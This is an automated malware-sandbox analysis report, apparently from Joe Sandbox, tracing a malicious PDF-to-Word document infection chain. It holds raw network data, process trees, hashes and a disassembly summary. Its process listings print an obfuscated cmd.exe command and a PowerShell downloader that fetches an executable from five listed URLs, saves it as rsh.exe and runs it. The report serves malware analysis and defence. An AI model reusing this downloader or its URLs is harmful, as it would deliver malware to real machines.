ff fe fb f7 1f 4c 11 80 c1 a2 a1 bf 2e d8 b0 20 9c ff 40 50 10 36 4c 08 40 c4 01 5c a1 ff 2b 32 ff 59 78 ff ba ee 7f 53 b8 11 96 0f 10 e0 af 3a ed 5f 15 62 fa 1f 2b 86 de 65 c2 ed 66 61 8a 30 85 c1 1e 9e c1 5c f3 5f 1c fc ab 88 83 7f d2 12 9a 12 d0 fb 07 4c 98 1d e8 e3 c4 ff cb 71 0d dc e6 6e 10 2c cc 34 15 6c 5c c0 2b 07 bc 54 ff eb 71 52 2a ca 1a 9a e0 bd 9f 2e 74 2d 40 80 09 f8 bb f1 1f 8e 03 b6 00 bd 7f 71 00 5d 0f ea 0b f0 52 c5 fa af b8 6e ee 6e e6 e0 3d 9a 63 17 4c 1f c1 54 b1 ff 4b 3b b8 dd 2c 1d 9c c1 81 10 e7 10 f7 e8 e3 4c fe cb 71 92 b0 3f e5 4f f9 53 fe 94 3f e5 4f f9 53 fe 94 3f e5 4f f9 53 fe 94 ff 17 16 2d e4 82 8e b6 2a d9 3b 38 be 15 b2 d1 aa 0d be 5b 72 6a 85 d2 da b5 0a 69 72 b1 42 76 5b 85 b4 66 5b 21 7b ac 42 da a6 ad 84 87 ac c8 24 7b c8 de 35 86 34 e3 1a 19 1b 7e 04 67 6a eb 68 84 ac 71 a2 e0 17 50 4a d4 28 2d 72 94 07 31 ca 1f ff 43 34 ce 81 7b 1b 7c 03 fa 73 dd 70 43 78 14 09 5f 43 fa 2f 21 b5 e6 91 1e d3 08 af 55 45 14 7c 02 a5 b4 11 bc 19 03 0e 40 69 8d 44 d1 63 a3 3c 06 22 e9 cf 60 b5 a3 94 7a 85 db 91 f0 09 04 d3 ea 18 0a Data Ascii: 1faaTM.IDAAC%@2HQ@`AE$K%KT[=~stS/<U]=p`0.x`U0L_"TM$\|KeM[w&7gk7SG&sS''g%%7!_8[P9>_vQ-%GUW`X09Ea8XDX$0A6W1`Xqo~#cL. @P6L@\+2YxS:_b+efa0\_Lqn,4l\+TqR.t-@q]Rnn=cLTK;,Lq?OS?OS?OS-*;8[rjirBv[f[!{B${54~gjhqPJ(-r1C4{\|spCx_C/!UE\|@iDc<"`z
Nov 27, 2018 14:01:06.768467903 CET	112	IN	Data Raw: de 85 52 9a 8e a2 c6 42 79 2c 45 52 9f 09 69 c0 42 f9 b7 0b ef 23 e1 5d 08 c2 d5 d9 90 66 4e 7d 63 23 c3 8f 7c 0d 28 a5 79 94 1a 39 ca 95 1a e5 bf 84 e3 4d 8c 32 9c c6 da 0e 39 80 21 fd 07 90 5a bd 48 c3 11 e8 72 5f 56 51 d0 81 1b c1 8d 88 23 bc Data Ascii: RBy,ERiB#]fN}c#\|(y9M29!ZHr_VQ#hMT]f54EC;dKkj7K9I7'"EJ5n1x-\|jpuJiIfEj/E17@\|MXi,c>,un!hoAi
Nov 27, 2018 14:01:06.769743919 CET	114	IN	Data Raw: 8e 82 cf e7 41 e6 82 52 5a c3 58 0c 4a 6b 09 49 03 59 cd 52 16 d4 b7 33 31 20 ba a9 e1 22 29 90 f0 81 a5 20 4a 70 d6 1a 3e 72 a6 0d 2b 43 9e 1c 86 22 21 46 23 f5 9e 7e 01 6d 81 f6 e2 0f 7b 82 bd 36 e8 bd 5d 98 bd f0 f6 a5 e0 43 50 05 9a a3 d3 53 Data Ascii: ARZXJkIYR31 ") Jp>r+C"!F#~m{6]CPSfQ#&b DI7.^Pwn5o&oI$y-xm' 8A>R/r(W2Yk,ck4{RtM%wv#JqHhGYkP.TB
Nov 27, 2018 14:01:06.771348953 CET	115	IN	Data Raw: 8d 91 0a e0 98 91 e0 46 b4 2e 56 c0 47 bf 47 6b 63 c2 90 66 39 63 8c 84 af 02 52 03 ed ca 35 bf 5d b9 0b 72 65 00 f7 0d 64 be d5 af 90 09 44 c1 a9 51 4a e4 28 2d 20 f3 f1 a3 58 09 39 9a 23 59 49 8d fe 35 c2 02 19 15 1f a8 e0 6f 90 e4 3d 8b 0b f9 Data Ascii: F.VGGkcf9cR5]redDQJ(- X9#YI5o="GvI<@;8L(iBLAC!KV)D{D!'LdLMXHfU"$E1]!0iCyMu5(ih`&MuJGiMM
Nov 27, 2018 14:01:06.773437977 CET	116	IN	Data Raw: 13 f4 05 0d 20 1e c2 a0 ad 55 b0 90 92 1e 32 4c 17 a2 dc 6b b9 02 ca d0 61 9a d0 31 33 31 e8 de 40 52 40 ba 0e 17 dd 68 64 98 2a e4 15 cf a0 ba 86 41 5f f2 7d 42 25 41 67 82 a4 88 7a a3 08 5d b3 56 0e 6c 83 c4 00 69 dd 28 79 55 a4 52 0d a4 0e ff Data Ascii: U2Lka131@R@hd*A_}B%Agz]Vli(yUR<R11F(4<FV%a=XQ D)5BX09t_}}t_A(Uhs[bc)`pj%72Z1RW`QJjyk&F%J4\|HplHMV(3
Nov 27, 2018 14:01:06.773631096 CET	117	IN	Data Raw: f5 2b e1 e2 4e 17 44 b7 b7 da 51 63 ff 44 04 7f ea b7 a7 c4 89 83 b9 77 f7 fb 50 6f 1e 21 90 5f 7a 6d b3 61 5e ab 7a 70 d1 61 1e 83 42 cd 74 4a 2c 83 22 9f d2 c0 32 8e 0d 05 a2 a3 c1 a4 fc ce d1 d9 74 04 39 5b f0 4e 0a 43 2d 8d bb 8d b6 aa 04 1f Data Ascii: +NDQcDwPo!_zma^zpaBtJ,"2t9[NC-aT>2!z"~fXdLT\`_Ex9Zbxg`r'<q813@!!!ww/(~+4P5%ba[EdO
Nov 27, 2018 14:01:06.773660898 CET	119	IN	Data Raw: 49 be fb 9f f1 b2 72 f1 aa ae b6 25 d2 fe 13 4f 9a ba 72 24 91 81 f8 22 84 f7 e1 a4 46 2a 1f 4f 93 08 c2 93 1c 76 bd 5d b3 ec 7a fb bf c3 63 21 96 84 dd 8e 98 77 6e 78 5a b3 72 99 ea 3f e3 d5 3e 6b c6 ab 92 6d 89 fe 27 9e 1f e3 fc 2b c6 c9 39 3c Data Ascii: Ir%Or$"F*Ov]zc!wnxZr?>km'+9<oWR&-F'k^/r{]m+gWgW)))Po9>Cap'c~qfC e+8T-W2
Nov 27, 2018 14:01:06.773682117 CET	119	IN	Data Raw: e8 59 c0 2b 2a 97 fb d7 82 d0 d6 0e fa 23 81 02 19 38 c1 26 b3 7b 64 cb f0 18 0e f5 f9 c6 c9 f2 7d e9 fa 8c 5b ef 6d ab af 59 47 49 5c b3 aa 20 fc c9 eb 1b a5 13 f6 96 71 a1 27 67 0e b2 2b 5b dd 24 fa 9a d4 5b 2e 15 54 45 29 2e 1b 24 4e 05 07 de Data Ascii: Y+*#8&{d}[mYGI\ q'g+[$[.TE).$N~BDMDGbcws=vF395rld\',kn;wGgI}%p\|d:rWzw&ZlpT?N\:Pnaf{e\|`ZsMgaUxY
Nov 27, 2018 14:01:06.774581909 CET	120	IN	Data Raw: 31 66 61 30 0d 0a 6b 2b 77 67 28 64 3c 75 dc a3 12 9c 7c 62 b5 4a 6b d3 15 b0 4b c2 42 fb 68 75 ae 89 de 24 5a 88 e7 93 5b 86 8c f8 c5 91 e4 3c 11 c7 e6 41 dd 2e e3 67 05 da ca 7d ac c5 e7 0c dd 71 ae 4f df 21 73 df cc a0 ff 14 3b 48 49 df b7 aa Data Ascii: 1fa0k+wg(d<u\|bJkKBhu$Z[<A.g}qO!s;HIuL~?[!%Qv/xsKr#9*l;l.y~wyi>co6)j1AylK.F@i}/W=o9Wf<F;f9]4K>M
Nov 27, 2018 14:01:06.775397062 CET	121	IN	Data Raw: 2c fa 99 3d 5e 0d 76 09 87 77 76 67 18 b3 1a 17 f9 63 ed 37 86 92 57 82 77 98 cd 62 72 7c 57 55 54 3b 02 ea d2 ae 17 02 25 c3 7d 01 44 ea 61 6a 36 e3 2f 53 36 b1 37 07 82 2a cc ec 62 0f 06 19 37 f3 cc 74 9c 8e b5 b0 e2 1e c8 81 48 6d 30 ab a5 22 Data Ascii: ,=^vwvgc7Wwbr\|WUT;%}Daj6/S67*b7tHm0"^rZg60\g]c+KZ8(c&qYPY<Pj"EkLf ^;-o]br-EDzi{Y2rm7=8lw9wsmT
Nov 27, 2018 14:01:06.892180920 CET	123	IN	Data Raw: 87 cb 14 45 f3 d6 5d 9a 3d 56 6c fd d8 6e 97 c3 aa dc f4 c9 45 ec a8 f2 04 1c 26 eb d4 97 0b f2 84 11 34 0b 5c cf cd 58 9e 88 a8 f1 41 63 ce 50 6d 5f 68 7c be 4f 04 8d ee 3c b3 f9 44 8a 5e cb bd 25 c9 80 b2 01 64 57 c4 de 29 ab 44 f7 2f 01 8c ce Data Ascii: E]=VlnE&4\XAcPm_h\|O<D^%dW)D/}uwPf}`Yq-x8LV3=ky<xo!r=H<oVdt8.Q>O)<((\..!N*'e@{vVWwD{y

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: AcroRd32.exe PID: 3696 Parent PID: 3288

General

Start time:	13:59:42
Start date:	27/11/2018
Path:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\DOC-642857352.pdf'
Imagebase:	0xcb0000
File size:	1544928 bytes
MD5 hash:	513659580A49DF6A85CDFD869895924A
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3820 Parent PID: 3696

General

Start time:	13:59:43
Start date:	27/11/2018
Path:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3696.0.183658897 --type=renderer 'C:\Users\user\Desktop\DOC-642857352.pdf'
Imagebase:	0xcb0000
File size:	1544928 bytes
MD5 hash:	513659580A49DF6A85CDFD869895924A
Has administrator privileges:	false
Programmed in:	"C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3808 Parent PID: 3000

General

Start time:	13:59:43
Start date:	27/11/2018
Path:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4 --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc
Imagebase:	0xcb0000
File size:	1544928 bytes
MD5 hash:	513659580A49DF6A85CDFD869895924A
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3636 Parent PID: 3808

General

Start time:	13:59:43
Start date:	27/11/2018
Path:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3808.0.1048347210 --type=renderer --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4
Imagebase:	0xcb0000
File size:	1544928 bytes
MD5 hash:	513659580A49DF6A85CDFD869895924A
Has administrator privileges:	false
Programmed in:	"C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 1992 Parent PID: 3696

General

Start time:	14:00:33
Start date:	27/11/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US
Imagebase:	0xfe0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1156 Parent PID: 1992

General

Start time:	14:00:33
Start date:	27/11/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:1992 CREDAT:275457 /prefetch:2
Imagebase:	0xfe0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WINWORD.EXE PID: 3048 Parent PID: 1992

General

Start time:	14:00:53
Start date:	27/11/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc
Imagebase:	0x2f0b0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 308 Parent PID: 3048

General

Start time:	14:00:56
Start date:	27/11/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Imagebase:	0x4ab60000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1496 Parent PID: 308

General

Start time:	14:00:57
Start date:	27/11/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Imagebase:	0x4ab60000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: OSPPSVC.EXE PID: 2844 Parent PID: 404

General

Start time:	14:00:57
Start date:	27/11/2018
Path:	C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Imagebase:	0x750000
File size:	4640000 bytes
MD5 hash:	358A9CCA612C68EB2F07DDAD4CE1D8D7
Has administrator privileges:	false
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 1640 Parent PID: 1496

General

Start time:	14:01:01
Start date:	27/11/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Imagebase:	0x221c0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 3420 Parent PID: 1640

General

Start time:	14:01:15
Start date:	27/11/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' =wwH
Imagebase:	0x221c0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rsh.exe PID: 2616 Parent PID: 1640

General

Start time:	14:01:30
Start date:	27/11/2018
Path:	C:\Users\user\AppData\Local\Temp\rsh.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\rsh.exe'
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	ECDBFA5FA4DE3282C7E8D00F73617144
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: rsh.exe PID: 1220 Parent PID: 2616

General

Start time:	14:01:32
Start date:	27/11/2018
Path:	C:\Users\user\AppData\Local\Temp\rsh.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\rsh.exe
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	ECDBFA5FA4DE3282C7E8D00F73617144
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: echoshims.exe PID: 3712 Parent PID: 404

General

Start time:	14:01:39
Start date:	27/11/2018
Path:	C:\Windows\System32\echoshims.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\echoshims.exe
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	ECDBFA5FA4DE3282C7E8D00F73617144
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: echoshims.exe PID: 3460 Parent PID: 3712

General

Start time:	14:01:39
Start date:	27/11/2018
Path:	C:\Windows\System32\echoshims.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\echoshims.exe
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	ECDBFA5FA4DE3282C7E8D00F73617144
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rsh.exe PID: 2616 Parent PID: 1640rsh.exeUNIQUE

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	66.3%
Signature Coverage:	13.3%
Total number of Nodes:	98
Total number of Limit Nodes:	8

Executed Functions

Function 001F1FF0, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 001F202E
NtAllocateVirtualMemory.NTDLL ref: 001F20B5

Strings

y, xrefs: 001F2059
w, xrefs: 001F2065
Z, xrefs: 001F2061
r, xrefs: 001F2055
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 001F201B
l, xrefs: 001F206D
A, xrefs: 001F2069
l, xrefs: 001F2071
l, xrefs: 001F2075

Memory Dump Source

Source File: 00000012.00000002.1052982410.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1f0000_rsh.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 735e7e2287646a26ed7818f4302e33c56cdf954be12e139933e0dda6558f4a94
Instruction ID: 8d1923df36a5eaeaa19fad6fadc0819baa57459a94f1de8c5586326b3e282ca0
Opcode Fuzzy Hash: 735e7e2287646a26ed7818f4302e33c56cdf954be12e139933e0dda6558f4a94
Instruction Fuzzy Hash: 103105B0D04348CBDB14CFA9D44469DBFB1AF89314F24C19DD858AB392C77A994ACFA1

Uniqueness

Uniqueness Score: 100.00%

Function 001F1EE0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 73
nativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 001F1F41
NtProtectVirtualMemory.NTDLL ref: 001F1FC0

Strings

M, xrefs: 001F1F6F
V, xrefs: 001F1F6B
Z, xrefs: 001F1F63
w, xrefs: 001F1F67
yyProtectairtual emory, xrefs: 001F1F03
@, xrefs: 001F1F56

Memory Dump Source

Source File: 00000012.00000002.1052982410.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1f0000_rsh.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 5da0d1ac30c451124eea1265b36d9a08683ddfe842000dafe165879d06a4b073
Instruction ID: 8f782fe4863ffa8b5ccfb10418b3218b4cdc57bb35d78b2609c19a359c834446
Opcode Fuzzy Hash: 5da0d1ac30c451124eea1265b36d9a08683ddfe842000dafe165879d06a4b073
Instruction Fuzzy Hash: 1931CFB5D04258CBDB10CF69C980B9DBBF0BB48314F2085AEE968AB342D7359945CF51

Uniqueness

Uniqueness Score: 100.00%

Function 00211C10, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00211C14

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 267ded2b4f246269cf5db5ee7d5663ca3c3989650889416ca64bc5a0ef34595c
Instruction ID: e5ea60b30de1026e962bc5db395d8afdda096ab7072bf5d67a8cb00eb592bc14
Opcode Fuzzy Hash: 267ded2b4f246269cf5db5ee7d5663ca3c3989650889416ca64bc5a0ef34595c
Instruction Fuzzy Hash: 47B09232608A2087833D3A79684C06850D84A6A33432A0762CF7A9BAE0A6709C625882

Uniqueness

Uniqueness Score: 0.01%

Function 002111CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 002111CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002111F1
CloseHandle.KERNEL32(?), ref: 002111FA
CloseHandle.KERNEL32(?), ref: 00211203
CloseHandle.KERNEL32 ref: 0021120A
CloseHandle.KERNEL32 ref: 00211211

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 8202075387082be3a59beb722bac043718e6940f35ad37bba573a831ed81b996
Instruction ID: 38aa7b6a65183c297a110a7000052b54447c8cf58084ae9fa872d1503e8b0d02
Opcode Fuzzy Hash: 8202075387082be3a59beb722bac043718e6940f35ad37bba573a831ed81b996
Instruction Fuzzy Hash: EEE03036600015BBDB116BE0FD0D9EDBB79EB19613F001261F616D00E0DB2146568B61

Uniqueness

Uniqueness Score: 0.01%

Function 0021103C, Relevance: 7.5, APIs: 5, Instructions: 46
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00211043
_snwprintf.NTDLL ref: 0021107F
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00211099
GetLastError.KERNEL32 ref: 002110A5
CloseHandle.KERNEL32(00000000), ref: 00211111

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID:
API String ID: 670123879-0
Opcode ID: 483b5d0695dc74c07fcf780d5d120abc0d2afbfc85cdac255c60549665cac9ae
Instruction ID: 794f144054bfd64a1e4356324f139a20a959230a4800a2222baecb6aa4519a2a
Opcode Fuzzy Hash: 483b5d0695dc74c07fcf780d5d120abc0d2afbfc85cdac255c60549665cac9ae
Instruction Fuzzy Hash: F301D471A00105B7DB21EBE0BC497EDB7B9EBA4341F1001A5EB0992141DB315AB58A92

Uniqueness

Uniqueness Score: 0.01%

Function 00212031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00212055
CloseHandle.KERNEL32(?), ref: 0021207C
CloseHandle.KERNEL32(?), ref: 00212085

Strings

D, xrefs: 00212039

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 095a592809232696fb6923633d80bdf9431671f6165efde562403bf862de627c
Instruction ID: 405bf7203ea744f2ab4fe4d5eefe1431d7d26ce29ce7491ea9ef417dc7ef48b5
Opcode Fuzzy Hash: 095a592809232696fb6923633d80bdf9431671f6165efde562403bf862de627c
Instruction Fuzzy Hash: 7FF06D31A50209BAEB215FD4EC05BEDBBB8EB19700F100251FA08A92D0DBB6A5A08654

Uniqueness

Uniqueness Score: 0.01%

Function 001F22CE, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 22
stringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 001F22FB

Strings

_E9e3X1YKeRS, xrefs: 001F22E2
ov8oTdn, xrefs: 001F22E9

Memory Dump Source

Source File: 00000012.00000002.1052982410.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1f0000_rsh.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: b1ad1f4d3f7d92402acd1f1916a2e218c8fce37a96e534e3527cab8cb1157e3e
Instruction ID: 8d412d92ea343a2400086fa392a8637639a1a8622dc07749ce5a7fe7958febc8
Opcode Fuzzy Hash: b1ad1f4d3f7d92402acd1f1916a2e218c8fce37a96e534e3527cab8cb1157e3e
Instruction Fuzzy Hash: 7CE092B0A102048BC714EF78EE015747BF0F755304F00806AD6099B360DB3069DACF92

Uniqueness

Uniqueness Score: 0.23%

Function 004015EE, Relevance: 3.1, APIs: 2, Instructions: 97
UNIQUE

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 0040166B
CopyStgMedium.URLMON ref: 004016C7

Part of subcall function 00401284: DdeGetData.USER32(0075CD6D,00000006,00000656,00000656), ref: 004012BC

